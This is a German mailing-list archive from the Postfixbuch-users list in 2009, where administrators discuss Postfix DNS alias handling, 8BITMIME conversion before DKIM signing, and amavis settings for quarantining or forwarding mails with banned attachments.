gmx.net at INTERNET.RELAY.INTERN-DOMAIN.DE < $TEXT > > Wird der genannte Befehl inkl. der Optionen "abgefeuert" wird der Namensanteil > INTERNET.RELAY.INTERN-DOMAIN.DE in den zugehörigen DNS > Servernamen (RELAY0815.INTERN-DOMAIN.DE) umgewandelt. (Info: Es handelt sich beim genannten > Namensanteil um einen DNS Alias) Ich vermute, damit ist RFC 5321, Abschnitt 5.1 im Spiel: ,----[ RFC 5321, 5.1 ] | Once an SMTP client lexically identifies a domain to which mail will | be delivered for processing (as described in Sections 2.3.5 and 3.6), | a DNS lookup MUST be performed to resolve the domain name (RFC 1035 | [2]). | | [...] | | The lookup first attempts to locate an MX record associated with the | name. If a CNAME record is found, the resulting name is processed as | if it were the initial name. `---- Falls das wirklich so interpretierbar ist, wie ich das getan habe, dann bin ich fest davon überzeugt, daß sich dieses Verhalten nicht abstellen lässt. Ciao Stefan -- Stefan Förster http://www.incertum.net/ Public Key: 0xBBE2A9E9 FdI #93: Emacs - Warum werden die Funktionen nicht mit Passwörtern versehen? (Frank Klemm) From sebastian.opitz at gmx.net Fri Aug 21 14:52:09 2009 From: sebastian.opitz at gmx.net (Sebastian Opitz) Date: Fri, 21 Aug 2009 14:52:09 +0200 Subject: [Postfixbuch-users] Off-Topic: Source Routing In-Reply-To: <20090821121757.GT17045@mail.incertum.net> References: <1250856218.5034.25.camel@alf> <20090821121757.GT17045@mail.incertum.net> Message-ID: <1250859129.5034.27.camel@alf> Am Freitag, den 21.08.2009, 14:17 +0200 schrieb Stefan Förster: > Falls das wirklich so interpretierbar ist, wie ich das getan habe, > dann bin ich fest davon überzeugt, daß sich dieses Verhalten nicht > abstellen lässt. > Besten Dank für den Hinweis. Sieht tasächlich so aus als wenn der Mechnismus auf dem von mir genannten Weg nicht abzuschalten ist. Gruß, Sebastian From mail at roland-ramthun.de Tue Aug 25 17:49:23 2009 From: mail at roland-ramthun.de (Roland Ramthun) Date: Tue, 25 Aug 2009 17:49:23 +0200 Subject: [Postfixbuch-users] =?iso-8859-1?q?7-Bit-Konvertierung_f=FCr_DKIM?= Message-ID: <1251215363.20593.35.camel@localhost> Hallo Liste, ich hadere gerade etwas mit dem DKIM RFC. In Punkt 5.3 des DKIM RFCs 4871 steht Folgendes: 5.3. Normalize the Message to Prevent Transport Conversions Some messages, particularly those using 8-bit characters, are subject to modification during transit, notably conversion to 7-bit form. Such conversions will break DKIM signatures. In order to minimize the chances of such breakage, signers SHOULD convert the message to a suitable MIME content transfer encoding such as quoted-printable or base64 as described in MIME Part One [RFC2045] before signing. Such conversion is outside the scope of DKIM; the actual message SHOULD be converted to 7-bit MIME by an MUA or MSA prior to presentation to the DKIM algorithm. [...] Es gibt ja seit Mitte der 90er Jahre die 8BITMIME-Erweiterung für ESMTP, die in den Default-Konfigurationen der meisten Mailserver heute auch aktiv ist und eine gewisse Menge Bandbreite spart. Nun muss man die 8-Bit-Kodierung aber offenbar wieder loswerden. Es stellt sich die Frage, wie man das am besten macht. Ich denke daran über smtpd_discard_ehlo_keywords 8BITMIME zu entfernt. Dann sollte der Client ja in 7-Bit senden, als base64 oder quoted-printable (vgl. oben). Im MIME RFC 2045 steht nun noch folgendes: Because quoted-printable data is generally assumed to be line-oriented, it is to be expected that the representation of the breaks between the lines of quoted-printable data may be altered in transport, in the same manner that plain text mail has always been altered in Internet mail when passing between systems with differing newline conventions. If such alterations are likely to constitute a corruption of the data, it is probably more sensible to use the base64 encoding rather than the quoted-printable encoding. "Line alteration in transport" würde die Signatur aber zerstören (der Body wird ja selten "relaxed" geprüft). Insofern scheint mir die Empfehlung des DKIM RFS für quoted-printable doch nicht so gut zu sein. Am besten wäre es also, wenn alle E-Mails base64 kodiert wären, bevor sie ins Signing gehen. Das lässt sich bestimmt über amavisd-new lösen. Stimmen die Überlegungen soweit? Wie habt ihr eure Setups gelöst, was das Encoding angeht? Danke für alle Antworten. Mit freundlichen Grüßen Roland Ramthun From cite+postfix-buch at incertum.net Tue Aug 25 18:17:03 2009 From: cite+postfix-buch at incertum.net (Stefan =?utf-8?Q?F=C3=B6rster?=) Date: Tue, 25 Aug 2009 18:17:03 +0200 Subject: [Postfixbuch-users] =?utf-8?q?7-Bit-Konvertierung_f=C3=BCr_DKIM?= In-Reply-To: <1251215363.20593.35.camel@localhost> References: <1251215363.20593.35.camel@localhost> Message-ID: <20090825161703.GA2441@mail.incertum.net> * Roland Ramthun : > Wie habt ihr eure Setups gelöst, was das Encoding angeht? amavisd-new für die Policy-Banks, die signieren, abgewöhnt, 8BITMIME zu advertisen (heilig's Blechle, was ein Deutsch!). Ciao Stefan -- Stefan Förster http://www.incertum.net/ Public Key: 0xBBE2A9E9 "Und wer ein Schöpfer sein will im Guten und Bösen: wahrlich, der muß ein Vernichter erst sein und Werte zerbrechen." From brandt at decoit.de Wed Aug 26 11:08:06 2009 From: brandt at decoit.de (Andre Brandt) Date: Wed, 26 Aug 2009 11:08:06 +0200 Subject: [Postfixbuch-users] Amavis: Banned Content weiterleiten? Message-ID: <4A94FB76.5060101@decoit.de> Hallo Liste, ich bin gerade am knobeln, wie ich das folgende Setup am besten umsetzen kann - falls es überhaupt geht... Ich habe hier das Gespann postfix+amavis laufen. Das Setup entspricht weitgehend dem, was im Buch vorgeschlagen wird - allerdings erfolgt die Einlieferung via Fetchmail. Jetzt ist es bei uns so, das wir ab und an Mails reinbekommen die "gebannte" Anhänge tragen. Ursprünglich wurden die Anhänge einfach ins Quarantäneverzeichnis geschoben und bei Bedarf weitergeleitet. Da die Anzahl dieser Mails aber zunimmt und es auch Benutzern, die nicht so Shellfest sind, möglich sein soll die Mails weiterzuleiten, suche ich einen Weg das umzusetzen. Erste Idee war, in Amavis einfach ein Postfach zu setzen an das die Mails weitergeleitet werden - nur wird dann ja nicht die Mail dorthin geschoben, sondern die Bounce Mail. Wenn ich in amavis allerdings D_PASS konfiguriere, wird die Mail ja an den eigentlichen Empfänger weitergeleitet. Lässt sich amavis überhaupt so konfigurueren, dass alle Mails mit verbannten Dateiendungen komplett und unverändert an einen bestimmten Benutzer weitergeleitet werden? Gruß und Dank im Vorraus, A.Brandt From brandt at decoit.de Wed Aug 26 13:07:30 2009 From: brandt at decoit.de (Andre Brandt) Date: Wed, 26 Aug 2009 13:07:30 +0200 Subject: [Postfixbuch-users] Amavis: Banned Content weiterleiten? In-Reply-To: <4A94FB76.5060101@decoit.de> References: <4A94FB76.5060101@decoit.de> Message-ID: <4A951772.9030703@decoit.de> Hmm... okay... hat sich erledigt - habs gefunden :) $banned_quarantine_to erledigt das... Andre Brandt schrieb: > Hallo Liste, > > ich bin gerade am knobeln, wie ich das folgende Setup am besten > umsetzen kann - falls es überhaupt geht... > > Ich habe hier das Gespann postfix+amavis laufen. Das Setup entspricht > weitgehend dem, was im Buch vorgeschlagen wird - allerdings erfolgt > die Einlieferung via Fetchmail. Jetzt ist es bei uns so, das wir ab > und an Mails reinbekommen die "gebannte" Anhänge tragen. Ursprünglich > wurden die Anhänge einfach ins Quarantäneverzeichnis geschoben und bei > Bedarf weitergeleitet. > Da die Anzahl dieser Mails aber zunimmt und es auch Benutzern, die > nicht so Shellfest sind, möglich sein soll die Mails weiterzuleiten, > suche ich einen Weg das umzusetzen. > Erste Idee war, in Amavis einfach ein Postfach zu setzen an das die > Mails weitergeleitet werden - nur wird dann ja nicht die Mail dorthin > geschoben, sondern die Bounce Mail. Wenn ich in amavis allerdings > D_PASS konfiguriere, wird die Mail ja an den eigentlichen Empfänger > weitergeleitet. Lässt sich amavis überhaupt so konfigurueren, dass > alle Mails mit verbannten Dateiendungen komplett und unverändert an > einen bestimmten Benutzer weitergeleitet werden? > > Gruß und Dank im Vorraus, > A.Brandt > > > -- > _______________________________________________ > Postfixbuch-users -- http://www.postfixbuch.de > Heinlein Professional Linux Support GmbH > > Postfixbuch-users at listen.jpberlin.de > https://listi.jpberlin.de/mailman/listinfo/postfixbuch-users From matthiasebner at yahoo.de Wed Aug 26 13:29:27 2009 From: matthiasebner at yahoo.de (Matthias Ebner) Date: Wed, 26 Aug 2009 13:29:27 +0200 Subject: [Postfixbuch-users] Amavis: Banned Content weiterleiten? In-Reply-To: <4A951772.9030703@decoit.de> Message-ID: <000301ca2640$799d39f0$0601a8c0@emnpc2> von Andre Brandt schrieb am Mittwoch, den 26. August 2009 > okay... hat sich erledigt - habs gefunden :) > $banned_quarantine_to erledigt das... > > Lässt sich amavis überhaupt so konfigurueren, dass > > alle Mails mit verbannten Dateiendungen komplett und unverändert an > > einen bestimmten Benutzer weitergeleitet werden? Wäre da nicht eher "$banned_files_lover" empfehlenswert? Ich hab's noch nicht benötigt. Hier wird nur getaggt und zugestellt, bzw. alle "banned files" werden direkt per RegExp-Prüfung abgewiesen (da der Amavis hier als post-queue-filter läuft). LG Matthias From gerald at holl.co.at Wed Aug 26 13:34:04 2009 From: gerald at holl.co.at (Gerald Holl) Date: Wed, 26 Aug 2009 13:34:04 +0200 Subject: [Postfixbuch-users] =?iso-8859-1?q?7-Bit-Konvertierung_f=FCr_DKIM?= In-Reply-To: <20090825161703.GA2441@mail.incertum.net> References: <1251215363.20593.35.camel@localhost> <20090825161703.GA2441@mail.incertum.net> Message-ID: <4A951DAC.9090609@holl.co.at> On 25.08.2009 18:17, Stefan Förster wrote: > * Roland Ramthun: >> Wie habt ihr eure Setups gelöst, was das Encoding angeht? > > amavisd-new für die Policy-Banks, die signieren, abgewöhnt, 8BITMIME > zu advertisen (heilig's Blechle, was ein Deutsch!). Hallo, geht recht einfach via $policy_bank{'ORIGINATING'} = { # mail originates from our users originating => 1, # permits DKIM signing (among other things) # force MTA conversion to 7-bit before DKIM signing to avoid later conversions, destroying signature: smtpd_discard_ehlo_keywords => ['8BITMIME'], }; cheers, Gerald